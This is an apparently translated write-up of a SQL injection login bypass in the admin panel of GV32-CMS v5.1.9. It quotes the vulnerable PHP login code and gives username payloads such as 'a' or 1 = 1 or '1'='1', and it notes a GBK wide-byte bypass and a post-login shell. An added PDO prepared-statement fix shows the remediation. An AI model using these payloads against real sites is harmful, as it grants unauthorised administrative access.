GV32-CMS Enterprise Website System v5.1.9 getshell

Author: roker
GV32-CMS Enterprise Website System v5.1.9

The official site describes it like this: GV32-CMS Enterprise Website System is a free, open-source, professional enterprise website-building system developed on a PHP+MySQL core. The software has many excellent features, such as high execution efficiency, freely switchable templates and convenient back-end management. All of the code is original work by GV32.COM, with full intellectual property rights. Thanks to GV32.COM's continuous spirit of innovation and serious working attitude, GV32-CMS Enterprise Website System has become the most usable enterprise website system among similar software at home and abroad!

That last sentence blew me away.
so,
look at the back-end login verification file
application\adminsys\login.php
[php]
function actlogin( )
{
    $use_nameval = $GLOBALS['Reque'] -> funpost("use_name"); // not filtered, you know what that means
    $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
    $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");

    $this -> logincount();

    if($use_captchaval!=$_SESSION["Img"])
    {
        $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
        $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
        $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
        $GLOBALS['Templ'] -> display('suggestion_tpl.html');
    }else{
        // the raw use_name value is concatenated straight into the SQL text
        $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
        //exit();
        $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);

        if($adminInfo["emplyeeUser"]["use_id"])
        {
            $GLOBALS['WebSe'] -> SetSession( $adminInfo );

            $nowtime = time();

            $adminip = $GLOBALS['Helpe'] -> getip();
            // login succeeded: update the user record
            $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
            $GLOBALS['MySql'] -> querySql($sqlup);

            // login succeeded: reset this IP's error count to 0
            $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
            $GLOBALS['MySql'] -> querySql( $updateip );

            $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
            $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
            $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
            $GLOBALS['Templ'] -> display('suggestion_tpl.html');
            //var_dump($_SESSION);
        }else{
            $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
            $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
            $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
            $GLOBALS['Templ'] -> display('suggestion_tpl.html');

            /*
            header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
            exit();
            */
        }
    }
}
[/php]
use_name is not filtered.
Use the universal password admin 'or '1'='1
(in the username field) and you're in.
Of course, sometimes the account isn't admin.
Let's look at the query more carefully:
[php]
$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
[/php]
Construct the username like this:
[php]
a' or 1 = 1 or '1'='1
[/php]

If magic_quotes_gpc is on, and the program's default character set is GBK or another wide-byte character set, we can use a wide-byte bypass.
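The same user lookup rebuilt around a PDO prepared statement, as an added example that is not GV32-CMS code: the request values are bound as parameters, so the `a' or 1 = 1 or '1'='1` string above is compared as a literal username instead of being parsed as SQL, and the DSN charset comment covers the wide-byte remark. The function names, `$pdo`, the `gv_` prefix and the SQLite test data are assumptions.

```php
<?php
// Added example, not GV32-CMS code: the actlogin() user lookup rebuilt around a
// PDO prepared statement. $pdo, the 'gv_' prefix and the function names are assumptions.

// Vulnerable pattern from the write-up: request values concatenated into the SQL text.
function buildVulnerableQuery(string $prefix, string $useName, string $usePwd): string
{
    return " SELECT use_id,use_name,use_email FROM " . $prefix . "user"
         . " WHERE use_name= '" . $useName . "' AND use_pwd = '" . md5($usePwd) . "'"
         . " and use_enabled = 1 LIMIT 1 ";
}

// Hardened lookup: the table prefix comes from configuration, so it is still
// interpolated; both request-derived values are bound as parameters and never
// become part of the statement's grammar.
function findEnabledUser(PDO $pdo, string $prefix, string $useName, string $usePwd): ?array
{
    $sql = "SELECT use_id, use_name, use_email FROM `{$prefix}user`"
         . " WHERE use_name = :name AND use_pwd = :pwd AND use_enabled = 1 LIMIT 1";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':name', $useName, PDO::PARAM_STR);
    $stmt->bindValue(':pwd', md5($usePwd), PDO::PARAM_STR); // keeps the existing md5 column
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// For a MySQL deployment, also pin the connection charset in the DSN and turn off
// emulated prepares: emulation escapes client-side using the connection charset,
// and a mismatched charset is exactly what a GBK wide-byte bypass relies on:
//   new PDO('mysql:host=...;dbname=...;charset=utf8mb4', $user, $pass,
//           [PDO::ATTR_EMULATE_PREPARES => false]);

// Demonstration on an in-memory SQLite table with constructed data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE gv_user (use_id INTEGER PRIMARY KEY, use_name TEXT,"
         . " use_pwd TEXT, use_email TEXT, use_enabled INTEGER)");
$pdo->exec("INSERT INTO gv_user VALUES (1, 'admin', '" . md5('correct-horse') . "',"
         . " 'admin@example.invalid', 1)");

$payload = "a' or 1 = 1 or '1'='1";   // the username string shown in the write-up
echo buildVulnerableQuery('gv_', $payload, 'x'), PHP_EOL; // WHERE clause is now always true

// null: the payload is matched as a literal username and no such user exists
var_dump(findEnabledUser($pdo, 'gv_', $payload, 'x'));
// the real credentials still return the admin row
var_dump(findEnabledUser($pdo, 'gv_', 'admin', 'correct-horse'));
```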
Getting a shell from the back end is simple, so I won't go into it; you all know how.
